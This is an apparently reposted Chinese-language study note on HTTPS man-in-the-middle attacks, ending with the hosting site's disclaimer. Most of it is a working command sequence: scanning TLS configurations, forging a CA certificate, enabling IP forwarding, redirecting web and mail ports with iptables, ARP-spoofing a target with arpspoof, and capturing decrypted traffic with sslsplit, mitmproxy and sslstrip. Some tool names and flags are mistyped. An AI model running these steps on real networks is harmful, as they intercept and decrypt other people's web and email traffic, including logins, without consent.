标签:中间人 md www nat -- tcp iptables https ports
https中间人攻击
使用tls/ssl方法进行加密传输
http攻击方法
- 降级攻击
- 解密攻击(明文,证书伪造)
- 协议漏洞,实现漏洞,配置不严格
openssl
openssl s_client -connect www.baidu.com:443
****
sslscan
自动识别ssl配置错误,过期协议
默认检查 CRIME heartbleed 漏洞
绿色: 安全 红色:注意
sslscan -tlsall www.baidu.com:443
sslscan --show-certificate --no-ciphersuites www.baidu.com:443
sslyze
sslyze --regular www.baidu.com
nmap
nmap --script=ssl-enum-ciphers.nse www.baidu.com
攻击类型
二层攻击
三层攻击
攻击前提:
客户端信任伪造证书
攻击端控制证书颁发机构
客户端禁止了显示证书颁发错误
arp实现
sslspit
透明ssl/tls中间人攻击
生成本地证书私钥:
openssl genrsa -out ca.key 2048
利用私钥生成证书:
openssl req -new -509 -days 1096 -key ca.key -out ca.crt
打开os的路由转发功能:
sysctl -w net.ipv4.ip_forward=1
关闭80,443端口占用程序:
netstat -ptanu | grep :80
开启端口转发:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
iptables -t nat -L
arp欺骗:
arpspoof -i eth0 -t 1.1.1.2 -r 1.1.1.1
启动SSLsplit:
mkdir -p test/log
sslsplit -D -l connect.log -j /root/test -S log/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
Mitmproxy
mitmproxy -T --host -w mitmproxy.log
sslstrip
强制客户端到中间人流量变为明文
ssltrip -l 8080
标签:中间人,md,www,nat,--,tcp,iptables,https,ports 来源: https://www.cnblogs.com/nsfoxer/p/16317317.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。